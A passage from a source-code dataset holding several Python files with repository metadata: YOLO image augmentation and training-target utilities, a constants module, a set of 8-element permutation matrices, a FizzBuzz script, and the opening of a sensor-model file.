] | 1 | 2020-11-13T18:52:23.000Z | 2020-11-13T18:52:23.000Z | xl_tensorflow/models/vision/detection/utils/yolo_utils.py | Lannister-Xiaolin/xl_tensorflow | 99e0f458769ee1e45ebf55c789961e40f7d2eeac | [
"Apache-2.0"
] | null | null | null | #!usr/bin/env python3
# -*- coding: UTF-8 -*-
from functools import reduce
from PIL import Image, ImageFont, ImageDraw
import numpy as np
from matplotlib.colors import rgb_to_hsv, hsv_to_rgb
import colorsys
def compose(*funcs):
    """Compose arbitrarily many functions, evaluated left to right.

    ``compose(f, g)(x)`` equals ``g(f(x))``. A single function is returned
    unchanged; calling with no functions raises ValueError.

    Reference: https://mathieularose.com/function-composition-in-python/
    """
    if not funcs:
        raise ValueError('Composition of empty sequence not supported.')

    def _chain(inner, outer):
        # Wrap so the outer function receives the inner function's result.
        return lambda *args, **kwargs: outer(inner(*args, **kwargs))

    return reduce(_chain, funcs)
def letterbox_image(image, size, fill=128):
    """Resize *image* to fit inside *size* without changing its aspect ratio.

    The image is scaled to the largest size that fits, then centred on a
    solid canvas of colour (fill, fill, fill). Returns the padded RGB image.
    """
    src_w, src_h = image.size
    dst_w, dst_h = size
    # Largest scale at which the whole image still fits in the target box.
    ratio = min(dst_w / src_w, dst_h / src_h)
    scaled_w = int(src_w * ratio)
    scaled_h = int(src_h * ratio)
    resized = image.resize((scaled_w, scaled_h), Image.BICUBIC)
    canvas = Image.new('RGB', size, (fill, fill, fill))
    # Centre the resized image on the canvas.
    offset = ((dst_w - scaled_w) // 2, (dst_h - scaled_h) // 2)
    canvas.paste(resized, offset)
    return canvas
def rand(a=0, b=1):
    """Uniform random float in [a, b)."""
    sample = np.random.rand()
    return sample * (b - a) + a
def get_random_data(annotation_line, input_shape, random=True,
                    max_boxes=20, jitter=.3, hue=.1, sat=1.5, val=1.5, proc_img=True):
    '''Random preprocessing for real-time data augmentation.

    annotation_line: "img_path x1,y1,x2,y2,cls ..." with absolute integer
        pixel coordinates and class ids.
    input_shape: (h, w) target network input size.
    random: when False, deterministically letterbox the image onto a grey
        (128, 128, 128) canvas (normalised by /255) and rescale the boxes;
        when True, additionally apply random scale/aspect jitter, random
        placement, a 50% horizontal flip and HSV colour distortion.
    Returns (image_data, box_data): image_data is an (h, w, 3) float array in
    [0, 1] (or the int 0 on the deterministic path when proc_img is False);
    box_data is a zero-padded (max_boxes, 5) array of
    x_min, y_min, x_max, y_max, class rows.
    '''
    line = annotation_line.split()
    image = Image.open(line[0])
    iw, ih = image.size
    h, w = input_shape
    # One row per box: [x_min, y_min, x_max, y_max, class].
    box = np.array([np.array(list(map(int, box.split(',')))) for box in line[1:]])
    if not random:
        # Deterministic path: letterbox-resize, preserving aspect ratio.
        scale = min(w / iw, h / ih)
        nw = int(iw * scale)
        nh = int(ih * scale)
        dx = (w - nw) // 2
        dy = (h - nh) // 2
        image_data = 0
        if proc_img:
            image = image.resize((nw, nh), Image.BICUBIC)
            new_image = Image.new('RGB', (w, h), (128, 128, 128))
            new_image.paste(image, (dx, dy))
            image_data = np.array(new_image) / 255.
        # Rescale/shift boxes into the letterboxed coordinate frame.
        box_data = np.zeros((max_boxes, 5))
        if len(box) > 0:
            np.random.shuffle(box)
            if len(box) > max_boxes: box = box[:max_boxes]
            box[:, [0, 2]] = box[:, [0, 2]] * scale + dx
            box[:, [1, 3]] = box[:, [1, 3]] * scale + dy
            box_data[:len(box)] = box
        return image_data, box_data
    # Augmented path: jitter aspect ratio and overall scale, then resize.
    new_ar = w / h * rand(1 - jitter, 1 + jitter) / rand(1 - jitter, 1 + jitter)
    scale = rand(.25, 2)
    if new_ar < 1:
        nh = int(scale * h)
        nw = int(nh * new_ar)
    else:
        nw = int(scale * w)
        nh = int(nw / new_ar)
    image = image.resize((nw, nh), Image.BICUBIC)
    # Paste the jittered image at a random offset on a grey canvas.
    dx = int(rand(0, w - nw))
    dy = int(rand(0, h - nh))
    new_image = Image.new('RGB', (w, h), (128, 128, 128))
    new_image.paste(image, (dx, dy))
    image = new_image
    # 50% chance of a horizontal flip.
    flip = rand() < .5
    if flip: image = image.transpose(Image.FLIP_LEFT_RIGHT)
    # Random HSV distortion: shift hue (wrapping into [0, 1]) and scale
    # saturation/value up or down.
    hue = rand(-hue, hue)
    sat = rand(1, sat) if rand() < .5 else 1 / rand(1, sat)
    val = rand(1, val) if rand() < .5 else 1 / rand(1, val)
    x = rgb_to_hsv(np.array(image) / 255.)
    x[..., 0] += hue
    x[..., 0][x[..., 0] > 1] -= 1
    x[..., 0][x[..., 0] < 0] += 1
    x[..., 1] *= sat
    x[..., 2] *= val
    x[x > 1] = 1
    x[x < 0] = 0
    image_data = hsv_to_rgb(x)  # numpy array, 0 to 1
    # Transform boxes to the augmented frame, mirror on flip, clip to the
    # canvas and drop boxes that became degenerate (<= 1px wide or tall).
    box_data = np.zeros((max_boxes, 5))
    if len(box) > 0:
        np.random.shuffle(box)
        box[:, [0, 2]] = box[:, [0, 2]] * nw / iw + dx
        box[:, [1, 3]] = box[:, [1, 3]] * nh / ih + dy
        if flip: box[:, [0, 2]] = w - box[:, [2, 0]]
        box[:, 0:2][box[:, 0:2] < 0] = 0
        box[:, 2][box[:, 2] > w] = w
        box[:, 3][box[:, 3] > h] = h
        box_w = box[:, 2] - box[:, 0]
        box_h = box[:, 3] - box[:, 1]
        box = box[np.logical_and(box_w > 1, box_h > 1)]  # discard invalid box
        if len(box) > max_boxes: box = box[:max_boxes]
        box_data[:len(box)] = box
    return image_data, box_data
def draw_image(image, out_boxes, out_scores, out_classes, class_names):
    """Draw labelled detection boxes onto *image* (modified in place).

    out_boxes rows are (top, left, bottom, right); out_scores/out_classes are
    parallel arrays of confidences and class indices. One colour per class is
    generated by spreading hues evenly. Returns the annotated image.
    Requires font/FiraMono-Medium.otf relative to the working directory.
    """
    font = ImageFont.truetype(font='font/FiraMono-Medium.otf',
                              size=np.floor(3e-2 * image.size[1] + 0.5).astype('int32'))
    # Box outline thickness scales with image size.
    thickness = (image.size[0] + image.size[1]) // 300
    # Evenly spaced hues -> one RGB colour per class.
    hsv_tuples = [(x / len(class_names), 1., 1.) for x in range(len(class_names))]
    colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
    for i, c in reversed(list(enumerate(out_classes))):
        predicted_class = class_names[c]
        box = out_boxes[i]
        score = out_scores[i]
        label = '{} {:.2f}'.format(predicted_class, score)
        draw = ImageDraw.Draw(image)
        label_size = draw.textsize(label, font)
        top, left, bottom, right = box
        # Round to integers and clip the box to the image bounds.
        top = max(0, np.floor(top + 0.5).astype('int32'))
        left = max(0, np.floor(left + 0.5).astype('int32'))
        bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))
        right = min(image.size[0], np.floor(right + 0.5).astype('int32'))
        print(label, (left, top), (right, bottom))
        # Place the label above the box, or just inside when there is no room.
        if top - label_size[1] >= 0:
            text_origin = np.array([left, top - label_size[1]])
        else:
            text_origin = np.array([left, top + 1])
        # My kingdom for a good redistributable image drawing library.
        # Simulate a thick outline with nested 1px rectangles.
        # NOTE(review): this inner `i` shadows the enumerate index above;
        # harmless because the index is rebound next iteration, but confusing.
        for i in range(thickness):
            draw.rectangle(
                [left + i, top + i, right - i, bottom - i],
                outline=colors[c])
        draw.rectangle(
            [tuple(text_origin), tuple(text_origin + label_size)],
            fill=colors[c])
        draw.text(text_origin, label, fill=(0, 0, 0), font=font)
        del draw
    return image
def get_classes(classes_path):
    """Load class names from a text file, one name per line (whitespace stripped)."""
    with open(classes_path) as handle:
        lines = handle.readlines()
    return [line.strip() for line in lines]
def get_anchors(anchors_path):
    """Load anchors from a file: one comma-separated line of w,h pairs.

    Returns a float array of shape (N, 2).
    """
    with open(anchors_path) as handle:
        raw = handle.readline()
    values = [float(token) for token in raw.split(',')]
    return np.array(values).reshape(-1, 2)
def preprocess_true_boxes(true_boxes, input_shape, anchors, num_classes):
    '''
    Preprocess true boxes into the YOLO training target format.
    Every box is assigned to exactly one grid cell at one scale.

    Args:
        true_boxes: array, shape=(m, T, 5), absolute values.
            Absolute x_min, y_min, x_max, y_max, class_id relative to input_shape.
        input_shape: array-like, hw, multiples of 32
        anchors: array, shape=(N, 2), 2 refer to wh, N refer to number of anchors
        num_classes: integer

    Returns:
        y_true: list of arrays shaped like the YOLO outputs, e.g.
            [array(m, 13, 13, 3, 5+num_classes), ...]; x, y, w, h are stored
            as fractions of the whole image.

    Each box is matched to the single anchor with the highest IoU (computed
    as if box and anchor shared a common centre); that anchor's index picks
    the output scale, and the box centre picks the grid cell within it.
    If two boxes map to the same cell and anchor, the later one overwrites
    the earlier.
    '''
    assert (true_boxes[..., 4] < num_classes).all(), 'class id must be less than num_classes'
    num_layers = len(anchors) // 3  # default setting
    anchor_mask = [[6, 7, 8], [3, 4, 5], [0, 1, 2]] if num_layers == 3 else [[3, 4, 5], [1, 2, 3]]
    true_boxes = np.array(true_boxes, dtype='float32')
    input_shape = np.array(input_shape, dtype='int32')
    # Convert corner boxes to centre/size, then normalise by image size.
    boxes_xy = (true_boxes[..., 0:2] + true_boxes[..., 2:4]) // 2
    boxes_wh = true_boxes[..., 2:4] - true_boxes[..., 0:2]
    true_boxes[..., 0:2] = boxes_xy / input_shape[::-1]
    true_boxes[..., 2:4] = boxes_wh / input_shape[::-1]
    m = true_boxes.shape[0]
    # Grid sizes per scale: strides 32, 16, 8.
    grid_shapes = [input_shape // {0: 32, 1: 16, 2: 8}[l] for l in range(num_layers)]
    y_true = [np.zeros((m, grid_shapes[l][0], grid_shapes[l][1], len(anchor_mask[l]), 5 + num_classes),
                       dtype='float32') for l in range(num_layers)]
    # Expand dim to apply broadcasting.
    anchors = np.expand_dims(anchors, 0)
    anchor_maxes = anchors / 2.
    anchor_mins = -anchor_maxes
    valid_mask = boxes_wh[..., 0] > 0
    for b in range(m):
        # Discard zero rows.
        wh = boxes_wh[b, valid_mask[b]]
        if len(wh) == 0: continue
        # Expand dim to apply broadcasting.
        wh = np.expand_dims(wh, -2)
        box_maxes = wh / 2.
        box_mins = -box_maxes
        # IoU of every box against every anchor, both centred at the origin.
        intersect_mins = np.maximum(box_mins, anchor_mins)
        intersect_maxes = np.minimum(box_maxes, anchor_maxes)
        intersect_wh = np.maximum(intersect_maxes - intersect_mins, 0.)
        intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]
        box_area = wh[..., 0] * wh[..., 1]
        anchor_area = anchors[..., 0] * anchors[..., 1]
        iou = intersect_area / (box_area + anchor_area - intersect_area)
        # Find best anchor for each true box; this fixes the responsible
        # anchor (and hence the output scale) for that box.
        best_anchor = np.argmax(iou, axis=-1)
        for t, n in enumerate(best_anchor):
            for l in range(num_layers):
                # A box lands in exactly one scale: the one whose anchor
                # mask contains its best anchor.
                if n in anchor_mask[l]:
                    i = np.floor(true_boxes[b, t, 0] * grid_shapes[l][1]).astype('int32')
                    j = np.floor(true_boxes[b, t, 1] * grid_shapes[l][0]).astype('int32')
                    # A grid cell holds at most len(anchor_mask[l]) boxes;
                    # a later box with the same cell+anchor overwrites.
                    k = anchor_mask[l].index(n)
                    c = true_boxes[b, t, 4].astype('int32')
                    y_true[l][b, j, i, k, 0:4] = true_boxes[b, t, 0:4]
                    # real object confidence
                    y_true[l][b, j, i, k, 4] = 1
                    y_true[l][b, j, i, k, 5 + c] = 1
    return y_true
def data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes, seperate_y=True):
    """Infinite batch generator for fit_generator.

    Shuffles annotation_lines in place at the start of each epoch, augments
    each sample via get_random_data, and yields either
    (images, y_true_list) or ((images, *y_true_list), dummy_zeros) depending
    on ``seperate_y``. Assumes annotation_lines is non-empty
    (data_generator_wrapper guards this).
    """
    total = len(annotation_lines)
    index = 0
    while True:
        images = []
        boxes = []
        for _ in range(batch_size):
            if index == 0:
                # New epoch: reshuffle the (caller-owned) annotation list.
                np.random.shuffle(annotation_lines)
            image, box = get_random_data(annotation_lines[index], input_shape, random=True)
            images.append(image)
            boxes.append(box)
            index = (index + 1) % total
        image_data = np.array(images)
        box_data = np.array(boxes)
        y_true = preprocess_true_boxes(box_data, input_shape, anchors, num_classes)
        if seperate_y:
            yield image_data, y_true
        else:
            yield (image_data, *y_true), np.zeros(batch_size)
def data_generator_wrapper(annotation_lines, batch_size, input_shape, anchors, num_classes, seperate_y=True):
    """Validated front-end for data_generator.

    Drops blank annotation lines; returns None instead of a generator when
    there is nothing to iterate (no lines, or a non-positive batch size).
    """
    lines = [line for line in annotation_lines if line.strip()]
    if not lines or batch_size <= 0:
        return None
    return data_generator(lines, batch_size, input_shape, anchors, num_classes, seperate_y)
| 36.711921 | 109 | 0.570759 | 0 | 0 | 843 | 0.072993 | 0 | 0 | 0 | 0 | 2,529 | 0.21898 |
d30abca75b19bde3ab81fb5f1a0732de35ef0670 | 416 | py | Python | src/python/shared/constants.py | rgrannell1/monic-polynomial | dec350112ec28a065e7be70151da20b203cde35b | [
"Unlicense"
] | null | null | null | src/python/shared/constants.py | rgrannell1/monic-polynomial | dec350112ec28a065e7be70151da20b203cde35b | [
"Unlicense"
] | 10 | 2016-05-29T22:48:29.000Z | 2021-09-14T10:38:06.000Z | src/python/shared/constants.py | rgrannell1/polynomial | dec350112ec28a065e7be70151da20b203cde35b | [
"Unlicense"
] | null | null | null |
import os
constants = {
'print_frequency': 10_000,
'flush_threshold': 10_000,
'tile_size': 5_000,
'project_root': os.path.realpath(os.path.join(os.path.dirname(__file__), '../../../')),
'colours': {
'background': 'black'
},
'escapes': {
'line_up': '\x1b[A',
'line_delete': '\x1b[K'
},
'units': {
'bytes_per_gibibyte': 2 ** 30
},
'batch_size': 200_000,
'paths': {
'db': './db.sqlite'
}
}
| 17.333333 | 88 | 0.584135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 208 | 0.5 |
d30ac629c524ea866310dba919699e150da5f2f1 | 7,143 | py | Python | server/permatrix.py | osaizar/sand | b98c954090af69410589360a68e68cd10d52f782 | [
"Apache-2.0"
] | null | null | null | server/permatrix.py | osaizar/sand | b98c954090af69410589360a68e68cd10d52f782 | [
"Apache-2.0"
] | null | null | null | server/permatrix.py | osaizar/sand | b98c954090af69410589360a68e68cd10d52f782 | [
"Apache-2.0"
] | null | null | null | import random
import numpy as np
MATRIX = [(7, 6, 2, 1, 0, 3, 5, 4),
(6, 5, 0, 1, 3, 2, 4, 7),
(1, 0, 3, 7, 5, 4, 6, 2),
(7, 5, 2, 6, 1, 3, 0, 4),
(0, 4, 2, 3, 7, 1, 6, 5),
(7, 1, 0, 2, 3, 5, 6, 4),
(3, 4, 2, 6, 0, 7, 5, 1),
(6, 1, 5, 2, 7, 4, 0, 3),
(3, 1, 4, 5, 0, 7, 2, 6),
(3, 2, 6, 5, 0, 4, 1, 7),
(3, 0, 6, 1, 7, 5, 4, 2),
(0, 6, 1, 7, 4, 2, 5, 3),
(3, 5, 2, 0, 7, 4, 6, 1),
(5, 4, 0, 3, 1, 7, 2, 6),
(4, 1, 6, 3, 2, 7, 0, 5),
(3, 7, 5, 1, 2, 0, 6, 4),
(4, 5, 2, 7, 6, 0, 3, 1),
(7, 2, 4, 6, 0, 3, 1, 5),
(3, 7, 5, 6, 1, 0, 4, 2),
(0, 5, 4, 3, 7, 2, 1, 6),
(4, 0, 2, 3, 1, 6, 5, 7),
(1, 7, 6, 3, 4, 0, 2, 5),
(5, 7, 3, 2, 6, 1, 4, 0),
(1, 3, 0, 5, 2, 7, 4, 6),
(7, 4, 3, 5, 1, 6, 0, 2),
(5, 1, 3, 0, 4, 2, 6, 7),
(7, 0, 2, 3, 1, 5, 6, 4),
(4, 0, 7, 6, 1, 5, 3, 2),
(5, 3, 6, 1, 4, 7, 2, 0),
(2, 4, 5, 1, 7, 0, 6, 3),
(1, 2, 4, 3, 6, 5, 0, 7),
(4, 7, 6, 5, 0, 2, 3, 1),
(4, 5, 3, 0, 6, 2, 7, 1),
(5, 7, 6, 3, 2, 1, 0, 4),
(5, 6, 7, 0, 4, 2, 1, 3),
(0, 7, 2, 6, 5, 4, 3, 1),
(6, 0, 5, 1, 3, 4, 2, 7),
(7, 1, 5, 2, 3, 4, 6, 0),
(2, 5, 4, 7, 0, 1, 3, 6),
(4, 5, 0, 6, 1, 2, 3, 7),
(3, 2, 0, 6, 7, 4, 5, 1),
(2, 6, 3, 1, 5, 0, 4, 7),
(7, 4, 2, 1, 6, 3, 5, 0),
(5, 3, 2, 6, 1, 0, 4, 7),
(6, 5, 4, 0, 3, 7, 2, 1),
(6, 2, 7, 3, 5, 1, 4, 0),
(3, 4, 2, 7, 6, 0, 1, 5),
(1, 6, 0, 3, 7, 2, 4, 5),
(2, 7, 4, 1, 5, 3, 0, 6),
(3, 1, 0, 5, 4, 2, 6, 7),
(6, 1, 2, 7, 5, 4, 0, 3),
(7, 5, 6, 2, 0, 4, 1, 3),
(5, 3, 2, 7, 0, 4, 6, 1),
(2, 6, 5, 0, 1, 3, 7, 4),
(2, 4, 5, 3, 0, 1, 7, 6),
(4, 0, 2, 1, 6, 3, 7, 5),
(5, 0, 6, 2, 3, 4, 7, 1),
(0, 2, 6, 7, 3, 5, 1, 4),
(3, 4, 0, 7, 2, 1, 6, 5),
(1, 2, 4, 3, 5, 7, 6, 0),
(5, 2, 4, 7, 1, 3, 0, 6),
(7, 5, 1, 3, 6, 0, 4, 2),
(4, 6, 1, 3, 5, 2, 7, 0),
(0, 5, 3, 1, 4, 2, 6, 7),
(2, 3, 1, 4, 5, 6, 7, 0),
(6, 1, 0, 7, 2, 5, 4, 3),
(3, 6, 1, 7, 0, 4, 5, 2),
(4, 7, 2, 3, 1, 0, 5, 6),
(1, 2, 3, 4, 6, 5, 7, 0),
(5, 4, 3, 1, 2, 0, 7, 6),
(6, 0, 4, 7, 5, 2, 3, 1),
(2, 6, 5, 4, 0, 1, 3, 7),
(1, 3, 4, 5, 0, 2, 6, 7),
(0, 5, 6, 7, 2, 1, 4, 3),
(2, 1, 6, 0, 3, 7, 4, 5),
(6, 7, 5, 3, 2, 0, 1, 4),
(0, 7, 2, 5, 6, 1, 4, 3),
(1, 6, 0, 5, 7, 2, 4, 3),
(5, 1, 6, 4, 2, 7, 0, 3),
(6, 3, 1, 0, 2, 4, 7, 5),
(3, 1, 7, 4, 5, 0, 6, 2),
(4, 6, 7, 5, 1, 2, 3, 0),
(7, 1, 2, 6, 3, 4, 0, 5),
(3, 6, 7, 2, 1, 4, 0, 5),
(7, 6, 0, 5, 1, 4, 2, 3),
(2, 5, 3, 1, 7, 4, 6, 0),
(7, 5, 2, 6, 3, 1, 4, 0),
(0, 3, 5, 2, 6, 7, 1, 4),
(1, 6, 5, 2, 3, 7, 0, 4),
(4, 0, 1, 3, 6, 7, 2, 5),
(6, 4, 3, 5, 0, 7, 1, 2),
(1, 0, 3, 7, 2, 5, 4, 6),
(2, 5, 0, 1, 3, 7, 6, 4),
(3, 2, 1, 5, 7, 4, 6, 0),
(1, 3, 6, 7, 0, 4, 2, 5),
(5, 0, 4, 3, 2, 1, 7, 6),
(6, 0, 3, 7, 4, 5, 1, 2),
(5, 1, 0, 3, 4, 2, 7, 6),
(6, 4, 0, 2, 5, 3, 1, 7),
(7, 2, 4, 5, 0, 1, 6, 3),
(0, 1, 3, 4, 2, 6, 7, 5),
(3, 6, 5, 7, 0, 2, 1, 4),
(2, 1, 4, 6, 5, 7, 0, 3),
(6, 4, 7, 0, 5, 3, 2, 1),
(6, 3, 7, 4, 1, 2, 0, 5),
(3, 4, 5, 6, 2, 7, 0, 1),
(5, 3, 1, 6, 4, 0, 7, 2),
(1, 4, 0, 3, 2, 5, 6, 7),
(3, 1, 7, 6, 4, 5, 0, 2),
(3, 4, 0, 5, 7, 6, 2, 1),
(3, 4, 0, 6, 7, 2, 1, 5),
(7, 2, 1, 3, 0, 5, 6, 4),
(2, 1, 5, 7, 0, 3, 4, 6),
(6, 3, 7, 5, 0, 1, 4, 2),
(0, 1, 2, 6, 4, 5, 7, 3),
(4, 7, 5, 6, 2, 1, 0, 3),
(3, 4, 6, 7, 1, 2, 5, 0),
(6, 0, 7, 2, 3, 4, 1, 5),
(5, 4, 6, 3, 1, 2, 0, 7),
(7, 1, 2, 4, 0, 6, 3, 5),
(7, 4, 5, 1, 3, 0, 2, 6),
(6, 2, 4, 5, 0, 7, 3, 1),
(5, 6, 3, 2, 1, 7, 4, 0),
(0, 1, 4, 7, 2, 5, 6, 3),
(7, 6, 2, 5, 3, 4, 0, 1),
(6, 5, 4, 7, 2, 1, 3, 0),
(6, 2, 1, 3, 4, 0, 7, 5),
(5, 0, 7, 3, 1, 4, 2, 6),
(5, 6, 2, 0, 7, 4, 1, 3),
(5, 7, 3, 0, 6, 2, 1, 4),
(3, 1, 7, 4, 5, 0, 2, 6),
(4, 0, 7, 6, 3, 5, 1, 2),
(5, 4, 0, 3, 2, 7, 1, 6),
(5, 3, 2, 1, 6, 0, 4, 7),
(3, 1, 7, 6, 4, 2, 5, 0),
(0, 3, 5, 1, 7, 6, 2, 4),
(6, 4, 1, 7, 2, 5, 0, 3),
(7, 2, 6, 4, 5, 3, 0, 1),
(5, 1, 3, 4, 2, 6, 7, 0),
(6, 1, 7, 0, 5, 3, 2, 4),
(4, 6, 0, 1, 2, 3, 5, 7),
(3, 4, 0, 2, 7, 1, 6, 5),
(5, 1, 2, 0, 4, 3, 7, 6),
(5, 1, 3, 0, 4, 7, 2, 6),
(3, 7, 1, 2, 5, 0, 6, 4),
(6, 5, 2, 1, 3, 4, 0, 7),
(3, 4, 7, 6, 5, 0, 2, 1),
(5, 1, 3, 7, 4, 2, 6, 0),
(6, 4, 0, 7, 3, 2, 5, 1),
(0, 2, 4, 3, 6, 7, 1, 5),
(5, 0, 7, 6, 4, 1, 3, 2),
(4, 6, 7, 2, 3, 5, 1, 0),
(1, 0, 5, 3, 6, 7, 4, 2),
(1, 4, 7, 6, 0, 3, 5, 2),
(7, 3, 4, 6, 5, 1, 2, 0),
(1, 3, 0, 6, 7, 4, 2, 5),
(5, 4, 6, 1, 2, 0, 7, 3),
(5, 3, 1, 0, 4, 2, 6, 7),
(7, 1, 4, 0, 3, 2, 5, 6),
(1, 2, 3, 7, 5, 6, 0, 4),
(7, 6, 3, 4, 5, 0, 1, 2),
(7, 0, 5, 6, 1, 4, 2, 3),
(0, 3, 7, 1, 6, 4, 2, 5),
(6, 0, 3, 1, 5, 2, 4, 7),
(7, 1, 4, 6, 3, 2, 0, 5),
(4, 5, 2, 7, 6, 0, 1, 3),
(3, 4, 0, 5, 7, 2, 6, 1),
(4, 3, 7, 6, 2, 5, 0, 1),
(4, 2, 1, 3, 7, 6, 5, 0),
(6, 0, 2, 5, 7, 3, 4, 1),
(4, 1, 5, 6, 7, 0, 3, 2),
(5, 6, 0, 2, 4, 3, 1, 7),
(0, 1, 2, 4, 5, 3, 7, 6),
(7, 0, 5, 1, 4, 6, 3, 2),
(5, 6, 7, 4, 0, 1, 3, 2),
(4, 6, 1, 5, 7, 3, 0, 2),
(1, 2, 7, 4, 0, 3, 5, 6),
(5, 6, 3, 0, 1, 2, 4, 7),
(3, 4, 6, 2, 7, 5, 0, 1),
(3, 4, 0, 6, 5, 2, 1, 7),
(6, 5, 0, 7, 1, 3, 4, 2),
(3, 0, 4, 6, 7, 2, 5, 1),
(1, 0, 2, 3, 4, 5, 6, 7),
(6, 7, 1, 0, 4, 3, 2, 5),
(1, 5, 3, 6, 4, 0, 2, 7),
(1, 0, 2, 3, 7, 4, 6, 5),
(7, 3, 2, 6, 5, 1, 4, 0),
(7, 5, 0, 6, 1, 2, 3, 4),
(0, 5, 3, 7, 2, 6, 4, 1),
(5, 7, 3, 4, 0, 2, 1, 6),
(1, 0, 4, 5, 2, 7, 3, 6),
(4, 5, 1, 3, 6, 0, 2, 7),
(6, 3, 7, 0, 4, 2, 5, 1),
(2, 4, 3, 6, 5, 1, 0, 7),
(4, 0, 7, 3, 5, 1, 6, 2),
(7, 3, 6, 4, 1, 2, 5, 0),
(7, 6, 5, 3, 1, 0, 4, 2),
(5, 4, 0, 6, 7, 2, 3, 1),
(7, 4, 0, 3, 1, 5, 6, 2),
(5, 6, 3, 0, 7, 2, 4, 1),
(0, 2, 7, 5, 6, 4, 3, 1),
(1, 6, 4, 2, 5, 3, 7, 0),
(6, 2, 3, 7, 0, 4, 5, 1),
(4, 7, 5, 2, 1, 6, 3, 0),
(4, 3, 0, 5, 1, 6, 7, 2),
(1, 6, 0, 7, 4, 3, 2, 5),
(0, 2, 6, 5, 4, 3, 1, 7),
(2, 5, 6, 7, 1, 0, 4, 3),
(2, 3, 6, 4, 1, 5, 0, 7),
(4, 7, 3, 6, 0, 1, 5, 2),
(5, 2, 6, 3, 7, 4, 1, 0),
(0, 3, 6, 5, 1, 7, 2, 4),
(0, 7, 6, 1, 4, 5, 3, 2),
(4, 3, 2, 1, 6, 7, 0, 5),
(7, 1, 6, 3, 0, 5, 4, 2),
(2, 6, 3, 7, 4, 0, 5, 1),
(7, 1, 2, 5, 3, 0, 4, 6),
(2, 5, 6, 7, 4, 1, 3, 0),
(6, 0, 1, 2, 4, 5, 7, 3),
(5, 3, 1, 2, 0, 7, 4, 6),
(7, 5, 2, 3, 6, 0, 4, 1),
(1, 7, 4, 3, 5, 6, 0, 2),
(5, 0, 4, 2, 6, 3, 7, 1),
(0, 5, 3, 7, 2, 4, 6, 1),
(1, 4, 0, 7, 3, 5, 2, 6),
(6, 1, 7, 3, 4, 0, 2, 5),
(6, 0, 5, 2, 3, 4, 1, 7),
(0, 3, 1, 4, 2, 6, 7, 5),
(3, 4, 1, 5, 7, 0, 2, 6),
(3, 7, 2, 4, 5, 6, 0, 1),
(1, 2, 3, 4, 5, 7, 6, 0),
(2, 4, 3, 7, 1, 0, 6, 5),
(3, 7, 4, 2, 0, 5, 6, 1),
(3, 1, 0, 6, 7, 2, 5, 4),
(5, 7, 0, 6, 3, 4, 2, 1),
(5, 1, 3, 0, 7, 2, 4, 6),
(3, 2, 6, 7, 5, 4, 0, 1),
(7, 2, 6, 3, 5, 0, 4, 1),
(4, 3, 6, 5, 1, 0, 7, 2),
(2, 4, 6, 1, 3, 5, 0, 7),
(2, 0, 5, 3, 6, 4, 1, 7),
(0, 3, 1, 2, 6, 4, 7, 5),
(6, 2, 5, 3, 0, 4, 1, 7),
(3, 7, 0, 4, 6, 1, 5, 2),
(2, 7, 3, 6, 0, 5, 1, 4),
(1, 4, 3, 5, 6, 2, 7, 0),
(7, 2, 6, 0, 4, 1, 5, 3),
(4, 2, 7, 5, 0, 6, 3, 1),
(1, 2, 7, 0, 3, 4, 5, 6),
(2, 4, 7, 6, 5, 1, 0, 3),
(5, 7, 0, 2, 6, 3, 4, 1),
(2, 5, 6, 4, 3, 1, 7, 0),
(1, 6, 4, 0, 7, 3, 5, 2),
(1, 4, 5, 7, 6, 3, 2, 0),
(6, 0, 1, 2, 7, 4, 3, 5),
(2, 4, 7, 1, 0, 5, 3, 6)]
def generate_permatrix():
    """Rebuild the global MATRIX as 256 distinct random permutations of 0..7,
    printing each one (as a Python tuple literal followed by a comma) so the
    output can be pasted back as source."""
    global MATRIX
    base = list(range(8))
    unique_perms = set()
    # Keep shuffling until 256 distinct permutations have been collected.
    while len(unique_perms) < 256:
        random.shuffle(base)
        unique_perms.add(tuple(base))
    MATRIX = list(unique_perms)
    for perm in MATRIX:
        print(str(perm) + ",")
def generate_server_permatrix():
    """Replace each permutation tuple in the global MATRIX with its 8x8
    uint8 permutation matrix: entry [row, col] is 1 where the tuple maps
    position col to value row."""
    for i in range(len(MATRIX)):
        perm = MATRIX[i]
        mat = np.zeros((8, 8), dtype=np.uint8)
        for row in range(8):
            # Column holding `row` in the tuple gets the 1 for this row.
            mat[row, perm.index(row)] = 1
        MATRIX[i] = mat
# Convert MATRIX to permutation-matrix form at import time so consumers see
# numpy arrays rather than tuples.
generate_server_permatrix()
| 25.329787 | 40 | 0.332773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0.00042 |
d30b795c9226a01b00b0c97716ea79f079c0f816 | 453 | py | Python | fizzbuzz.py | harman31/TwilioQuest | 9471bdc17bf2843a916576a52b45ee5b504378ab | [
"Unlicense"
] | null | null | null | fizzbuzz.py | harman31/TwilioQuest | 9471bdc17bf2843a916576a52b45ee5b504378ab | [
"Unlicense"
] | null | null | null | fizzbuzz.py | harman31/TwilioQuest | 9471bdc17bf2843a916576a52b45ee5b504378ab | [
"Unlicense"
] | null | null | null | import sys
# Set up a list for our code to work with that omits the first CLI argument,
# which is the name of our script (fizzbuzz.py)
inputs = sys.argv
inputs.pop(0)
# Process the "inputs" list as directed in your code
inputs = [int(x) for x in sys.argv[0:]]
for x in inputs:
if x % 3 == 0 and x % 5 == 0:
print("fizzbuzz")
elif x % 3 == 0:
print("fizz")
elif x % 5 == 0:
print("buzz")
else:
print(x) | 25.166667 | 77 | 0.589404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 198 | 0.437086 |
d30c5430832f65f46617b5e3e3d5b2e83f6f709d | 2,414 | py | Python | robotics/simulators/sensor_model.py | bkolligs/robotics-prototyping | ac7766921c7e8b2c51792697ddf2166ab9a46c82 | [
"MIT"
] | 3 | 2021-06-20T15:40:57.000Z | 2021-11-11T03:20:29.000Z | robotics/simulators/sensor_model.py | bkolligs/robotics-prototyping | ac7766921c7e8b2c51792697ddf2166ab9a46c82 | [
"MIT"
] | 3 | 2021-07-06T01:31:51.000Z | 2021-07-31T00:05:39.000Z | robotics/simulators/sensor_model.py | bkolligs/robotics-prototyping | ac7766921c7e8b2c51792697ddf2166ab9a46c82 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
